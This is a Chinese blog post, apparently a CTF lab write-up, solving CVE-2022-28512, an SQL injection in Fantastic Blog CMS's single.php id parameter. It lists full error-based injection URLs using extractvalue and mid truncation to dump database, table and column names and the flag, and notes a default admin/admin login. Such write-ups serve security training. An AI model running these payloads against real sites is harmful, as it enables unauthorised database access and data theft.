春秋云境CVE-2022-28512

最新推荐文章于 2024-05-09 21:19:02 发布
最新推荐文章于 2024-05-09 21:19:02 发布
阅读量1.1k 收藏 21
点赞数 30
分类专栏: 春秋云境 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64432806/article/details/136824654
版权

简介

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。

小插曲

进入靶场,发现文章的中间存在一个sign in的登录按钮。既然有登录按钮,那么我肯定不会放过,我要去试试

直接一个admin/admin就进入了后台,但是找了半天发现并没有任何有用的东西。所以我又回到主界面来看看。

这里我突然想到靶场的提示,这关是做sql注入的呀,既然存在注入,那么大概里就是存在文章帖子里面的注入了呀,那我进后台干什么呢?

正式注入

于是我直接随便点开一篇文章。

找到了,这个url和靶场给的提示一模一样,那么我们就找到注入点了。

判断闭合方式

首先通过单双引号来判断闭合,发现是单引号闭合。而且最开心的是,这个地方居然还有报错回显,这不妥妥的报错注入吗?

报错注入

报错注入有很多函数extractvalue函数和updatexml函数等

直接开始报错注入,先爆破数据库名

http://eci-2ze4tswnd2j5jqolwy34.cloudeci1.ichunqiu.com/single.php?id=5' and(extractvalue(1,concat(0x7e,(select database()),0x7e)))='1

爆破表名

第二步开始爆破表名

http://eci-2ze4tswnd2j5jqolwy34.cloudeci1.ichunqiu.com/single.php?id=5' and (extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='ctf'),0x7e)))='1

很明显我们看到这个报错出来的结尾不是~那么说明了一个问题,后面还有很多列名没有爆破出来,只是因为报错注入它本身返回的数据长度只有32位,所以我们这个时候需要用上截断函数来进行分批截取。

截断函数来配合爆破注入

截断函数有很多,列如mid函数还有left函数

http://eci-2ze4tswnd2j5jqolwy34.cloudeci1.ichunqiu.com/single.php?id=5' and (extractvalue(1,concat(0x7e,mid((select group_concat(table_name)from information_schema.tables where table_schema='ctf'),1,30),0x7e)))='1

我们只需要修改1,30这两个参数就可以进行表名的截断报错出来。

在通过漫长的修改我们重要找到我们想要的表名了。

http://eci-2ze4tswnd2j5jqolwy34.cloudeci1.ichunqiu.com/single.php?id=5' and (extractvalue(1,concat(0x7e,mid((select group_concat(table_name)from information_schema.tables where table_schema='ctf'),140,170),0x7e)))='1

爆破表名

那么就开始flag表名下的列名。很巧妙,列名和表名一样都是flag

http://eci-2ze4tswnd2j5jqolwy34.cloudeci1.ichunqiu.com/single.php?id=5' and (extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='ctf' and table_name='flag'),0x7e)))='1

爆破数据

那么就直接开始爆破数据啦

http://eci-2ze4tswnd2j5jqolwy34.cloudeci1.ichunqiu.com/single.php?id=5' and (extractvalue(1,concat(0x7e,(select group_concat(flag)from ctf.flag),0x7e)))='1

看到这个回显,原来又要用到我们的截断函数。

http://eci-2ze4tswnd2j5jqolwy34.cloudeci1.ichunqiu.com/single.php?id=5' and (extractvalue(1,concat(0x7e,mid((select group_concat(flag)from ctf.flag),20,50),0x7e)))='1

成功拿下这个靶场。

总结

这关难度不大,考的地方就两个,一个爆破注入还有一个是截断函数。把这两个方式结合在一起,就可以完成这个靶场。

是花花呢
关注
  • 30
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境CVE-2022-28512
ZXW_NUDT的博客
02-22 2393
春秋云境CVE-2022-28512
春秋云境CVE-2022-30887
一只爱吃橙子的羊
11-29 3861
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
春秋云境CVE-2022-24112
一只爱吃橙子的羊
12-04 2173
CVE-2022-24112:Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
春秋云境CVE-2022-28060
一只爱吃橙子的羊
11-29 2341
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋云境CVE-2022-28512靶场WP
果粒程
11-26 1143
春秋云境CVE-2022-28512靶场WP
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
医疗行业面临的网络安全挑战及应对策略
运维有小邓
05-06 361
ADManager Plus是一款企业级身份治理和管理解决方案,不仅可以帮助您的组织通过HIPAA规定,还可以通过GDPR、FISMA、SOX、PCI DSS等其他合规要求。除了150多种报告之外,该解决方案还提供了专属于AD和Microsoft 365环境的身份风险评估报告,并提供缓解网络风险的措施。
蓝桥杯-网络安全比赛(6) 模拟实验 Metasploit 控制并获取Windows 登录HASH、LM Hash和NTLM Hash密文解析
Superstacks超全栈
05-06 892
计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要。这是一个非常重要的设计原则,因为如果密码以明文形式存储,那么任何能够访问存储位置的人或程序都可以轻易地获取到密码,这显然是不安全的。在验证过程中,LSA可能会调用相应的验证程序包(如msv1_0.dll),对用户输入的信息进行处理,并与存储在SAM(安全账户管理器)数据库中的密钥进行对比。最后,winlogon进程对用户登录进行最后的处理,完成整个登录过程。
Web安全研究(九)
至臻求学,胸怀云月
05-05 1158
这段代码事实上实现了一个 webshell 的基本功能,因为它允许通过 URL 参数直接控制和执行服务器端的代码,极其危险。在实际应用开发中,应避免直接使用eval函数,特别是当其包含来自用户输入的数据时。同时,也应该对所有用户输入进行严格的验证和过滤,以减少潜在的安全风险。
【2024高校网络安全管理运维赛】巨细记录!
jayq1的博客
05-08 1628
虽然不是全部题目,但对于做出来的题目记录非常详细,题目还是挺有意思的,希望对师傅们有帮助,欢迎师傅们来交流指导!
网络安全(黑客)—-2024自学手册
xv7676的博客
05-06 1766
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
守护数字疆域:2024年网络安全报告深度解读
最新发布
junge_sys的博客
05-09 377
面对复杂多变的网络安全挑战,没有绝对的安全,只有不懈的努力。从个人到企业,从政策到技术,我们需携手共筑数字安全的长城。看完这份报告,你有何感想?你的组织是否经历过类似的挑战?留言分享你的经验或疑问,让我们在互动中学习,一同前行。记住,最好的防御,始于你我共同的警觉与行动。
网络安全(黑客)自学启蒙
白帽子佳奇的博客
05-08 1234
当我们谈论网络安全时,我们正在讨论的是保护我们的在线空间,这是我们所有人的共享责任。网络安全涉及保护我们的信息,防止被未经授权的人访问、披露、破坏或修改。
网络安全与信息安全
2301_79527080的博客
05-08 668
2、计算机病毒破坏过程:最初病毒程序寄生在介质上的某个程序中,处于静止状态,一旦程序被引导或调用,它就被激活,变成有传染能力的动态病毒,当传染条件满足时,病毒就侵入内存,随着作业进程的发展,它逐步向其他作业模块扩散,并传染给其他软件。9、IPSEC是由IETF制订的用于×××的协议。SSL记录层协议:它涉及应用程序提供的信息的分段、压缩数据认证和加密SSLv3提供对数据认证用的MD5和SHA以及数据加密用的R4主DES等支持,用来对数据进行认证和加密的密钥可以有通过SSL的握手协议来协商。
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值